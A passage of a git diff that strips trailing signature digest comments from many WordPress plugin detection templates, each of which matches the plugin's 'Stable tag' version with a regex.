4a0a0047304502204a16ab9d6f7562cb977211004987e3d7e5ea9dc51fa12b26012682cb1bf58d4c022100e039b9d721b7617b2c6c77fc43365347dbfbc724437f0349d34bd0f16a88c2f0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailpoet.yaml b/http/technologies/wordpress/plugins/mailpoet.yaml index 906f78d62e..aeb1875c57 100644 --- a/http/technologies/wordpress/plugins/mailpoet.yaml +++ b/http/technologies/wordpress/plugins/mailpoet.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100e97fc4da647b49a765e8fed38fbf72211e6b915488c962637510c21d54905649022100fce97014e517e0450b84792ce09e92f60f5f02b008371a8f14195c84ff11e6e0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/maintenance.yaml b/http/technologies/wordpress/plugins/maintenance.yaml index b215d73bae..7c15702305 100644 --- a/http/technologies/wordpress/plugins/maintenance.yaml +++ b/http/technologies/wordpress/plugins/maintenance.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100ba2edd6e0ca4d48220d46be91b6df4873950d73ed0dafe9cf057df57477229ff02210088c5ee722af91fe733b709ecd4cb71a0f58db25afc70055e2d35278c37fb6ee2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mainwp-child.yaml b/http/technologies/wordpress/plugins/mainwp-child.yaml index 3a26e3aaf3..5685dd5f08 100644 --- a/http/technologies/wordpress/plugins/mainwp-child.yaml +++ b/http/technologies/wordpress/plugins/mainwp-child.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402203478393cf30451d7450be0782832d9599643d5f746cee8161357397fcd9af3c702204fe34fa3c82e936f3c0731ed91cb73732d7a3952670f41757a9c3cdd089f726a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/malcare-security.yaml b/http/technologies/wordpress/plugins/malcare-security.yaml index dd58df5ac6..c342e6b45a 100644 --- a/http/technologies/wordpress/plugins/malcare-security.yaml +++ b/http/technologies/wordpress/plugins/malcare-security.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100c8f44e6cc4295c86116baa189df1c7b47b83367f4a0a608ee62ce5e8476eb501022100e0fbc57830a368dea050c5b1903c929191d714f19943709d84c6d82a499898df:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/megamenu.yaml b/http/technologies/wordpress/plugins/megamenu.yaml index d532c8910f..e95041f555 100644 --- a/http/technologies/wordpress/plugins/megamenu.yaml +++ b/http/technologies/wordpress/plugins/megamenu.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100bfab73a641db3a2cc668cb5a8837c45a66345ca33bca99dfccc84cd42a1329250221008a05ff754701501e7d4dd04365c22e5d3a66240571179a83f759a06a8dc2d0af:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/members.yaml b/http/technologies/wordpress/plugins/members.yaml index 5cd06c3080..879a0d1c12 100644 --- a/http/technologies/wordpress/plugins/members.yaml +++ b/http/technologies/wordpress/plugins/members.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022048909356c398590a508513188a319ef4c84fdff5a3a3197892a57a6be486f92c022100c115746ab2d9d0f2b3113460603c6fcba27b3f2c8b1e61a526d75b2159a9c99d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/meta-box.yaml b/http/technologies/wordpress/plugins/meta-box.yaml index 66b92eb428..985f5d373a 100644 --- a/http/technologies/wordpress/plugins/meta-box.yaml +++ b/http/technologies/wordpress/plugins/meta-box.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502205fd24ee812815539e86b59ce526905b0a47ada05b2252ddb88b45696bb79a758022100b42d031aadac3339cbf5dcca07a0ff54890b01e8fca34b7e0291b162d1442189:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/metform.yaml b/http/technologies/wordpress/plugins/metform.yaml index 1abade583d..effba09471 100644 --- a/http/technologies/wordpress/plugins/metform.yaml +++ b/http/technologies/wordpress/plugins/metform.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220436021e39d8efaa9d7c0070b70d13b55b5167fab5e2bde0c74664c5fd8513d63022100ee1c712160952847c9a801c0cd71def53d05c17a937df72090ba478222736b13:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ml-slider.yaml b/http/technologies/wordpress/plugins/ml-slider.yaml index 25ee37c26d..37153b7ae5 100644 --- a/http/technologies/wordpress/plugins/ml-slider.yaml +++ b/http/technologies/wordpress/plugins/ml-slider.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100f8c998c26a057b48aa7adf1dc83e03c909e353290d34b5c3d1d1195612a062c2022100a8e93d5b9d7b7bd9269302d00557d3ed2594ad255a81450d9225b917c3c3ca25:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/newsletter.yaml b/http/technologies/wordpress/plugins/newsletter.yaml index a5a7bbf2e2..7e3e4e2d7e 100644 --- a/http/technologies/wordpress/plugins/newsletter.yaml +++ b/http/technologies/wordpress/plugins/newsletter.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502210091f076723cfa73cdc1ae3c66f719a81e658a9ef2ee04f03d5c4cf2522b5a1a64022007ca5da80842e084f2e59dd6b367a55e8f1effd109a9ed59849ea441eb98355a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml index e2cb646d99..17ea142c46 100644 --- a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml +++ b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100fa27a3891646be4856e3ce9877879b624a5d3dc14882ad2330abb5be43a87a1702207effb46e16b3fc723e682d7be95b1d232c0000e5690279cb263a7020b813f637:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/nextgen-gallery.yaml b/http/technologies/wordpress/plugins/nextgen-gallery.yaml index 4053ce69f3..3462f5ea6b 100644 --- a/http/technologies/wordpress/plugins/nextgen-gallery.yaml +++ b/http/technologies/wordpress/plugins/nextgen-gallery.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502207903c8ed22fe823b1ad3983b5561bf7a7264c683d74736ffe98dc76254d927d4022100b3e24c2444aa5238438950c533cd09726b2396740dd041a9a2b6821fdc9d1b45:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ninja-forms.yaml b/http/technologies/wordpress/plugins/ninja-forms.yaml index 9fcbfdb1e3..5c9ae8bc4f 100644 --- a/http/technologies/wordpress/plugins/ninja-forms.yaml +++ b/http/technologies/wordpress/plugins/ninja-forms.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220584775b3dd588c39346b4768f56758ed97b6bf21c6179146a33d6c02edb25a3c022100a48211a32bc1ec7dc9b0ad6bc48139d1dddb0ab796f026bccd12016b532779d7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ocean-extra.yaml b/http/technologies/wordpress/plugins/ocean-extra.yaml index df4cabc2d6..5e1fe4ef5c 100644 --- a/http/technologies/wordpress/plugins/ocean-extra.yaml +++ b/http/technologies/wordpress/plugins/ocean-extra.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502200e7b88fe46258318a9f04b76fed111548b810c671728cbfb448fa47351749d0a022100b52d9db3df56dbf4ab4597790b0d99fb55cf81dd4ec2cb19c6b0f2de9eea897a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml index 465b4ee364..74fb3e6010 100644 --- a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml +++ b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022050a4392e967b3ac1e96512d2597ebcdb5d85b305dd2508ce09783e85c69a3e0b02200900c535b2835f676c59990fed6e5c4fba5bb949ce501e29274d61992bf1dcfb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/one-click-demo-import.yaml b/http/technologies/wordpress/plugins/one-click-demo-import.yaml index baae75c6a7..b9f70ba555 100644 --- a/http/technologies/wordpress/plugins/one-click-demo-import.yaml +++ b/http/technologies/wordpress/plugins/one-click-demo-import.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402205822b83925588d791f14ad71f790775189041cf624ba1c241e32193d7267531c022050c42bc9d40d5c9636a15b345d6392c16474d0e44dae2d895a447b281b934226:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/optinmonster.yaml b/http/technologies/wordpress/plugins/optinmonster.yaml index 5366a1a2a9..6486c02c9a 100644 --- a/http/technologies/wordpress/plugins/optinmonster.yaml +++ b/http/technologies/wordpress/plugins/optinmonster.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100bcb5fab2e1ba95720c36a7af0a31173cb00118c2207634f2ed11f8ce84cd85a3022100e105dc3dd54602fb96d915dc0f5af4064ee353e660d82a22e9e01b3846833394:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/otter-blocks.yaml b/http/technologies/wordpress/plugins/otter-blocks.yaml index c30a9847d0..81f58198d3 100644 --- a/http/technologies/wordpress/plugins/otter-blocks.yaml +++ b/http/technologies/wordpress/plugins/otter-blocks.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022056f754dfcd15f0ac1e145357658bf9e2db2dd2ea4718facb2991e07066e0bdc10220793f7b384e1808a7059b677013009d2729987708890cb4698591a015908bbc1a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/password-protected.yaml b/http/technologies/wordpress/plugins/password-protected.yaml index 5bce92525c..6ff90e0902 100644 --- a/http/technologies/wordpress/plugins/password-protected.yaml +++ b/http/technologies/wordpress/plugins/password-protected.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100c83beb0a14cf55b7746902f73563d5062df78e5d8a659e337b04c42599a6cd700221008d0b82e10889e05d8d45287a0fecf78bc23ae14c17ca7076d14d15184fc489de:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pdf-embedder.yaml b/http/technologies/wordpress/plugins/pdf-embedder.yaml index 2dff4ee352..a4c6980041 100644 --- a/http/technologies/wordpress/plugins/pdf-embedder.yaml +++ b/http/technologies/wordpress/plugins/pdf-embedder.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100c32d6e5f12ef4294f0afd036d2c1193913ed5e115aa3b89272affdd8c9da0641022100fbe20f2be599ddbe625ae5db2ba5a455a4b7e5a9e117feb77af73c36619f7436:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml index 27c833bd7c..e085f30e5a 100644 --- a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022057b05e8d4bbc7b17729aada433ceae381540fc37ce01023005cb022b77dd9400022100a85121878eb220ca0ec79bf7f41bfdaa975bca52bdda1f224e770a188c17253f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pixelyoursite.yaml b/http/technologies/wordpress/plugins/pixelyoursite.yaml index ef82cb2e72..27e45e39ca 100644 --- a/http/technologies/wordpress/plugins/pixelyoursite.yaml +++ b/http/technologies/wordpress/plugins/pixelyoursite.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100d8913f0ee47b99ab9aaaa9e5b5217fd0e802b802eb51d5bfd5b05d4d7c443d26022100871aa575de40dff9eaadd029023d4f0b7747c8a603b8dc6762840c6129383048:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/polylang.yaml b/http/technologies/wordpress/plugins/polylang.yaml index 477804ae27..eb6e1aaa5d 100644 --- a/http/technologies/wordpress/plugins/polylang.yaml +++ b/http/technologies/wordpress/plugins/polylang.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402200b47fefe89f6c986cc4b346b3fcde2cf4b0e1dedd3c775ad94672c98d990525d0220709eaeee01ed1f471d0f5012004cd5c4e3adcdeee8789333b84b4444c582f84d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/popup-maker.yaml b/http/technologies/wordpress/plugins/popup-maker.yaml index 7f4616fb26..d679d8df61 100644 --- a/http/technologies/wordpress/plugins/popup-maker.yaml +++ b/http/technologies/wordpress/plugins/popup-maker.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100db5acf7df6054a4621b085a4eced3e837079afae6220ad17f73ef6e888e8d201022100b0b3ea190defababdba891edba2b8db4b78512a980d1252e3f5012a529c4d66a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/post-smtp.yaml b/http/technologies/wordpress/plugins/post-smtp.yaml index 12b92ffb08..8bfe16ca84 100644 --- a/http/technologies/wordpress/plugins/post-smtp.yaml +++ b/http/technologies/wordpress/plugins/post-smtp.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022000d39c581908507b8827a2422e2bdc3a7311bc7e3ff795e13f87306a25d4f45a022044343a28b9ece7f98b90763dd907c91502af6928cd21dec83ad9694a5961fca2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/post-types-order.yaml b/http/technologies/wordpress/plugins/post-types-order.yaml index 37b62896be..a81fc892ca 100644 --- a/http/technologies/wordpress/plugins/post-types-order.yaml +++ b/http/technologies/wordpress/plugins/post-types-order.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100fd4438e860e564ba1426cfe9f2a779072de1f1dd53c7b84927a819ff6c19dbf80220137f0d1bf901799935f0fbb113ba61ddee120c6f7f5aa1382a43ef7f6c0d7279:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml index 546f249bee..d9c6052cd7 100644 --- a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100c995d98332da4f61429f047907faaa8eada354992cb8d0502ce7a032b922138f022100e69becd3bac38245747208a1c2ded3a3a4918b6e909791dfd401ea9b87ae47f5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pretty-link.yaml b/http/technologies/wordpress/plugins/pretty-link.yaml index ff826b7808..afc1141e0c 100644 --- a/http/technologies/wordpress/plugins/pretty-link.yaml +++ b/http/technologies/wordpress/plugins/pretty-link.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100a3f91e99e9453f7e00a5cb01feb488dbac16f135fab611095663b7ef25cb278002205091b0a34d3800dbce35ceac12ec6b500163211b759d2bec99d3c74ae989c3e9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/really-simple-captcha.yaml b/http/technologies/wordpress/plugins/really-simple-captcha.yaml index d7ea3e9053..d44add9ca6 100644 --- a/http/technologies/wordpress/plugins/really-simple-captcha.yaml +++ b/http/technologies/wordpress/plugins/really-simple-captcha.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a0048304602210087ed2350e61eeacd777504141a886cc60e0d4d3d38ebd940715b4de48cce311f0221008f877211200aa96cd5a55fa2be66cf74fda5bf83d0fdddc8be33513f264cbc77:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/really-simple-ssl.yaml b/http/technologies/wordpress/plugins/really-simple-ssl.yaml index be50d04889..67968fb008 100644 --- a/http/technologies/wordpress/plugins/really-simple-ssl.yaml +++ b/http/technologies/wordpress/plugins/really-simple-ssl.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100a26c1fd36e8f247b9887bb784796ee060c10297c5c41b4e88bf759e9202613f7022100eaf92ed75b6543ee8e80c0f61c11262b34ac17a9a23cb65c468097e70372c0e0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/redirection.yaml b/http/technologies/wordpress/plugins/redirection.yaml index 81e2f175ba..cbcf3cf09d 100644 --- a/http/technologies/wordpress/plugins/redirection.yaml +++ b/http/technologies/wordpress/plugins/redirection.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100bcb027f1540bf95aaa244f559a242da84d6273b3bbd8f4df15ff2f492bbea36f022100cba6619db460ef15d801466be8c58d5c0e0bea9850790b4570b8f99772c85c85:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/redux-framework.yaml b/http/technologies/wordpress/plugins/redux-framework.yaml index 3dccc830f9..3311d42c94 100644 --- a/http/technologies/wordpress/plugins/redux-framework.yaml +++ b/http/technologies/wordpress/plugins/redux-framework.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100a9811a6437809e2ec4277cd4a3798e2a9e45ac5176a76e4ce2341c42d8c99a9f0220289835b6cde0c013801ee7b338f96df66b1b89c25461d47ba5471bc6f5b95aa2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml index 10f5d84b14..46c1c22805 100644 --- a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022064d77ced4f403d87b5068b5aa403669f7cef151485a3f1f419535e1d8d0c3a5c0221008d2e10491dfe98979489ce7c6fc81509888a2a753a8dab042e061f2d4ed2281c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/royal-elementor-addons.yaml b/http/technologies/wordpress/plugins/royal-elementor-addons.yaml index 457b707f89..d22f60a5cd 100644 --- a/http/technologies/wordpress/plugins/royal-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/royal-elementor-addons.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022014504b311f8b0b5898436afebfe310307e4f224ad7f1c141206ad61a9480cb6a022100cf75e8c98dc8ab81a82db7e13c1b9bee9e3bc219994fb92cc48c435ff7145e09:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/safe-svg.yaml b/http/technologies/wordpress/plugins/safe-svg.yaml index a563f0a7d1..7c13b8d2a4 100644 --- a/http/technologies/wordpress/plugins/safe-svg.yaml +++ b/http/technologies/wordpress/plugins/safe-svg.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022020be69c975d57a720a526ccb7510bbca7b6b1b3eecf1e235ebc999b9dc6cebc2022100d9607f4082f1040d2532ec255bb0c54a1e6e836a162d133b8bb0744afe57c63e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml index 876235984f..2d4f463d97 100644 --- a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml +++ b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100b2470525bd67215bb801ffa3369b212d84533e54a78df83788ea5aa5d17b8087022100ad5a4c1f53ea4491636a51433dc398452b7b7a2055e3e3f944f19ed854fef67b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sg-cachepress.yaml b/http/technologies/wordpress/plugins/sg-cachepress.yaml index 3b3895ed32..cb67671918 100644 --- a/http/technologies/wordpress/plugins/sg-cachepress.yaml +++ b/http/technologies/wordpress/plugins/sg-cachepress.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100bb01cf65598d3b47dc6c79361ded7fe3581ff3e73bc3c662891fbf3ada71757f022100fe04c44cfacd75f71fce626ddbc9949705676540ab8b591535a021171b748d50:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sg-security.yaml b/http/technologies/wordpress/plugins/sg-security.yaml index a5fb18fbcb..cc3eb2481a 100644 --- a/http/technologies/wordpress/plugins/sg-security.yaml +++ b/http/technologies/wordpress/plugins/sg-security.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100a579abde215444b7e496ceafec5d79b6a1b96e1f7184a24a0eca05c61f8f66b2022012f39a378d50e6bf152abf42b12ca4f469cdbecdd3da547c48418fff02f775f5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml index d82f53f4ba..17584cd064 100644 --- a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml +++ b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100883d92044dd6a94b69457acb84aa9c40c02034b0c87e315fd2e4ba5e4e158de8022019665cebd74187a9bf3dc63996a15e3ecd8d0634a8a1b8ae58cdf8b06f5afd2c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml index 8d472d7557..015fb97043 100644 --- a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml +++ b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100ee789896a25df7caa1bdd5d0ace9713d03af70e56b260cdd19f74cde71187642022100e1ebb9fed460386078f1afb67624da01055ab8d117451c0b492a6e79ce73da7d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml index aa18d671a8..1d5224b457 100644 --- a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100d25d405fb19c7fc7735684d3409cad404c05496aa1886fbd655fc7646d2d9c970221008f85d37218c9372ed0c9104dcd2898fa76761c732ac2dbaaf2a3c9ddb731e5e2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/simple-history.yaml b/http/technologies/wordpress/plugins/simple-history.yaml index 46fc06b834..a33aa7964f 100644 --- a/http/technologies/wordpress/plugins/simple-history.yaml +++ b/http/technologies/wordpress/plugins/simple-history.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220172766bb24a58830a55b6e93be3237a04db0d175903559be7130e388c2a6291a02207e2140a14c24971855ddd46a5700e69ed10c929db2d8560a63d3c357643847dd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/siteguard.yaml b/http/technologies/wordpress/plugins/siteguard.yaml index 3ffdc721c2..aafd6c6a38 100644 --- a/http/technologies/wordpress/plugins/siteguard.yaml +++ b/http/technologies/wordpress/plugins/siteguard.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402205e46bb34cc3be4cff1618b654d370ec7cab72054cd6dab7307d1e65bbda5ac0b02202fd2be1933a582bcabb1868e729887ee93f7d0f223d7084f1071291ccfe430a5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/siteorigin-panels.yaml b/http/technologies/wordpress/plugins/siteorigin-panels.yaml index bcc64e2c86..e10ab985da 100644 --- a/http/technologies/wordpress/plugins/siteorigin-panels.yaml +++ b/http/technologies/wordpress/plugins/siteorigin-panels.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502204663fa4b904c3ab4bfd854b5436ce7ab9d84aa34cde7e1c242b5776b3eff8092022100e89b4dddf2a12197c0db54664ed161edc756ba1e640b9e5e1c638e2f777250ba:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/smart-slider-3.yaml b/http/technologies/wordpress/plugins/smart-slider-3.yaml index e07ba852b0..9881b591ae 100644 --- a/http/technologies/wordpress/plugins/smart-slider-3.yaml +++ b/http/technologies/wordpress/plugins/smart-slider-3.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402202bca171b4d0eed5b865ff872e22787f6896157769a67c01ceedbbf6ea215cb5b022074ec16ce084839b0e87adab0e3b7bcdf9fd07fc27e7b39a5dfb104492853dc4a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml index d8594e883b..69c367b8d5 100644 --- a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml +++ b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502205afed6bf7d13bc163678516b530fccbec8766bdd6044990ee69567933703a6d8022100d24d3aaf526b7f0b6175bb1233eae30b7a8365cead315d4cfac3adb0510fcf4c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml b/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml index cfb75dfa3f..7776b209df 100644 --- a/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100deab2e5a71950d92c1e6262d1f55f3ab7fd7e5257ffd02dccafcc2811050cc8f022100980f650bf824b37d6db559ca5baf49ae6ad3a02395c92e1ac034dd406645e2a8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml 